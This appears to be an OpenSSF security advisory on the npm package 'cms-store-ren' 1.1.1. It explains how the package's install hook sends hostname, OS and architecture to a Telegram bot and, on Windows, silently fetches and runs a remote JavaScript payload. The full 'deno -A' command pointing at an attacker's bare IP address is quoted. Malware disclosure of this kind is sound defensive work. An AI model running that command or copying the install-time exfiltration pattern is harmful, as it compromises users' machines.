The package's scripts.install runs install.js on every npm install. The script unconditionally POSTs the installer's hostname, OS, and architecture to api.telegram.org using a hardcoded bot token and chat ID (install.js:7 BOT_TOKEN = '8877182499:...', install.js:50-56 builds the message and sends via sendTelegramMessage()). On Windows, the same script writes a hidden PowerShell bootstrapper that installs Scoop/Winget and Deno, then executes deno -A http://77.90.185.225/deee80f30a6921b4.js — fetching an arbitrary JavaScript payload from a bare-IP HTTP URL and running it with all Deno permissions under a hidden PowerShell window. The package has no legitimate functionality (index.js only logs a string; placeholder author work1, description cms install) and exists solely to deliver the install-time payload. Both install-time host reconnaissance exfiltration and install-time arbitrary remote code execution from attacker infrastructure are present.

The OpenSSF Package Analysis project identified 'cms-store-ren' @ 1.1.1 (npm) as malicious.

It is considered malicious because:

• The package communicates with a domain associated with malicious activity.